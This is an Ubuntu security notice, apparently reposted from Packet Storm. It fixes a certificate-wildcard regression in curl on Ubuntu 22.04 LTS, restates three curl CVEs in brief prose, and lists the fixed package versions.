    ==========================================================================Ubuntu Security Notice USN-6237-2July 19, 2023curl regression==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:USN-6237-1 introduced a regression in curl.Software Description:- curl: HTTP, HTTPS, and FTP client and client librariesDetails:USN-6237-1 fixed vulnerabilities in curl. The update caused a certificatewildcard handling regression on Ubuntu 22.04 LTS. This update fixes theproblem.We apologize for the inconvenience.Original advisory details:  Hiroki Kurosawa discovered that curl incorrectly handled validating certain  certificate wildcards. A remote attacker could possibly use this issue to  spoof certain website certificates using IDN hosts. (CVE-2023-28321)   Hiroki Kurosawa discovered that curl incorrectly handled callbacks when  certain options are set by applications. This could cause applications  using curl to misbehave, resulting in information disclosure, or a denial  of service. (CVE-2023-28322)   It was discovered that curl incorrectly handled saving cookies to files. A  local attacker could possibly use this issue to create or overwrite files.  This issue only affected Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-32001)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   curl                            7.81.0-1ubuntu1.13   libcurl3-gnutls                 7.81.0-1ubuntu1.13   libcurl3-nss                    7.81.0-1ubuntu1.13   libcurl4                        7.81.0-1ubuntu1.13In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6237-2   https://ubuntu.com/security/notices/USN-6237-1   https://launchpad.net/bugs/2028170Package Information:   https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.13

Source

Packet Storm